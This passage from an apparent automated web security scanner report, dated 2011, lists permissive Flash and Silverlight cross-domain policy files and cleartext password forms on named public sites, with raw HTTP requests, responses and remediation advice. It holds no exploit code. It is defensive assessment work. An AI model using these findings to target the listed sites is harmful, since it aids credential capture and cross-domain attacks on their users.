<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.122. http://admin6.testandtarget.omniture.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admin6.testandtarget.omniture.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin6.testandtarget.omniture.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:21:50 GMT
Accept-Ranges: bytes
ETag: W/"313-1313024241000"
Connection: close
Set-Cookie: X-Mapping-obodhgke=C65CAE406CB199739E142186AC7C21A1; path=/
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 313

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s7sps1.scene7.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="s7sps5.scene7.com"/>
...[SNIP]...

6.123. http://api.twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:23 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 01:19:23 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.124. https://docs.google.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://docs.google.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Sun, 04 Sep 2011 19:29:21 GMT
Date: Sat, 03 Sep 2011 19:29:21 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 21186

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.125. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://matcher-rbc.bidder7.mookie1.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 27 Aug 2011 03:06:09 GMT
ETag: "3cd8207-116-4ab73f18d4a40"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="zaptrader.themig.com" />
...[SNIP]...

6.126. http://twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:53 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 01:54:53 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.127. http://www.traffic.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traffic.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.traffic.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b mod_jk/1.2.25
Last-Modified: Wed, 22 Apr 2009 22:26:16 GMT
ETag: "a4b03-9d-4682c40737200"
Accept-Ranges: bytes
Content-Length: 157
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="www.wfaa.com" />
</cross-domain-policy>

7. Silverlight cross-domain policy previous next
There are 13 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://content.usatoday.com/clientaccesspolicy.xml
http://metrics.sprint.com/clientaccesspolicy.xml
http://nmcharlotte.112.2o7.net/clientaccesspolicy.xml
http://pixel.quantserve.com/clientaccesspolicy.xml
http://s0.2mdn.net/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml
http://usatoday1.112.2o7.net/clientaccesspolicy.xml
http://video.od.visiblemeasures.com/clientaccesspolicy.xml
http://www.goutsa.com/clientaccesspolicy.xml
http://www.tulsaworld.com/clientaccesspolicy.xml
http://www.usatoday.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 04 Sep 2011 01:21:13 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:42:17 GMT
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.3. http://content.usatoday.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT
Accept-Ranges: bytes
ETag: "80964c5f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:14 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
<domain uri="*"/>

...[SNIP]...

7.4. http://metrics.sprint.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.sprint.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:11 GMT
Server: Omniture DC/2.0.0
xserver: www614
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.5. http://nmcharlotte.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nmcharlotte.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nmcharlotte.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:25 GMT
Server: Omniture DC/2.0.0
xserver: www86
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.6. http://pixel.quantserve.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 00:45:10 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 04 Sep 2011 00:45:10 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>
<resour
...[SNIP]...

7.7. http://s0.2mdn.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:23:13 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 1293
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.8. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:52:32 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:52:32 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.9. http://usatoday1.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usatoday1.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:19 GMT
Server: Omniture DC/2.0.0
xserver: www172
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.10. http://video.od.visiblemeasures.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.od.visiblemeasures.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: video.od.visiblemeasures.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 01:17:23 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Wed, 09 Mar 2011 01:34:37 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from>
               <domain uri="*" />
           </allow-from>
<grant-to>
<r
...[SNIP]...

7.11. http://www.goutsa.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.goutsa.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.goutsa.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:15 GMT
Server: Apache
Last-Modified: Thu, 26 Mar 2009 08:16:48 GMT
ETag: "18a-466013cce5c00"
Accept-Ranges: bytes
Content-Length: 394
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="https://*"/>
<domain uri="http://*"/>
...[SNIP]...

7.12. http://www.tulsaworld.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tulsaworld.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.tulsaworld.com

Response

HTTP/1.1 200 OK
Content-Length: 319
Content-Type: text/xml
Last-Modified: Fri, 26 Nov 2010 22:31:11 GMT
Accept-Ranges: bytes
ETag: "88a3a1a0b98dcb1:277"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:24 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resour
...[SNIP]...

7.13. http://www.usatoday.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT
Accept-Ranges: bytes
ETag: "80964c5f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:33 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
<domain uri="*"/>

...[SNIP]...

8. Cleartext submission of password previous next
There are 8 instances of this issue:

http://digg.com/submit
http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html
http://www.ispsports.com/radio-network-affiliates.cfm
http://www.sacbee.com/reg-bin/int.cgi
http://www.sacbee.com/reg-bin/int.cgi
http://www.thatsracin.com/reg-bin/int.cgi
http://www.thatsracin.com/reg-bin/int.cgi
http://www.thatsracin.com/reg-bin/int.cgi

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

8.1. http://digg.com/submit previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/submit

The form contains the following password field:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=26937 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.2. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.foxsportssouthwest.com
Path:	/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

The form contains the following password field:

login_password

Request

GET /09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html HTTP/1.1
Host: www.foxsportssouthwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/1.0.3
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 04 Sep 2011 01:26:08 GMT
Date: Sun, 04 Sep 2011 01:26:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='net_loginblock'></td>
...[SNIP]...

8.3. http://www.ispsports.com/radio-network-affiliates.cfm previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ispsports.com
Path:	/radio-network-affiliates.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ispsports.com/affiliate-employee-login.cfm

The form contains the following password field:

password

Request

GET /radio-network-affiliates.cfm HTTP/1.1
Host: www.ispsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:26:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</h5>

       <form id="login" action="affiliate-employee-login.cfm" method="post">
           <div id="username">
...[SNIP]...
</label>
               <input id="password_field" type="password" name="password" title="Password" value="" tabindex="2" />
           </div>
...[SNIP]...

8.4. http://www.sacbee.com/reg-bin/int.cgi previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.sacbee.com/reg-bin/int.cgi

The form contains the following password fields:

password
pwconfirm

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
gs: new
...[SNIP]...
<br />

<form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()">

<input type="hidden" name="mode" value="register_done" />
...[SNIP]...
<td><input type="password" name="password" class="miregpassword" id="miregpasswordpassword" value=""></td>
...[SNIP]...
<td><input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwconfirm" value=""></td>
...[SNIP]...

8.5. http://www.sacbee.com/reg-bin/int.cgi previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.sacbee.com/reg-bin/int.cgi

The form contains the following password field:

password

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
gs: new
...[SNIP]...
</h3>
<form id="LoginForm" name="LoginForm" action="/reg-bin/int.cgi" method="post">
<input type="hidden" name="mode" value="login_done" />
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" size="25" class="miregtext">
<input type="image" id="signin-button" src="/static/images/signin-button.png" value="Sign In" />
...[SNIP]...

8.6. http://www.thatsracin.com/reg-bin/int.cgi previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thatsracin.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thatsracin.com/reg-bin/int.cgi

The form contains the following password field:

password

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="
...[SNIP]...
</h3>
<form name="LoginForm" action="/reg-bin/int.cgi" method=post>
<input type="hidden" name="mode" value="login_done">
...[SNIP]...
</label>
<input type="password" name="password" class="miregtext" value="">
<p class="form-notif">
...[SNIP]...

8.7. http://www.thatsracin.com/reg-bin/int.cgi previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thatsracin.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thatsracin.com/reg-bin/int.cgi

The form contains the following password fields:

password
pwconfirm

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="
...[SNIP]...
</script>

<form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()" id="registration">
<input type="hidden" name="mode" value="register_done">
...[SNIP]...
</label>
<input type="password" name="password" class="miregpassword" id="miregpasswordpassword" value="">
</div>
...[SNIP]...
</label>
<input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwconfirm" value="">
</div>
...[SNIP]...

8.8. http://www.thatsracin.com/reg-bin/int.cgi previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thatsracin.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thatsracin.com/reg-bin/int.cgi

The form contains the following password field:

password

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="
...[SNIP]...
<div class="login-form">
<form method="post" action="/reg-bin/int.cgi">
<input type="hidden" value="login_done" name="mode"/>
...[SNIP]...
</label>
<input type="password" class="text" name="password" />

...[SNIP]...

9. SSL cookie without secure flag set previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

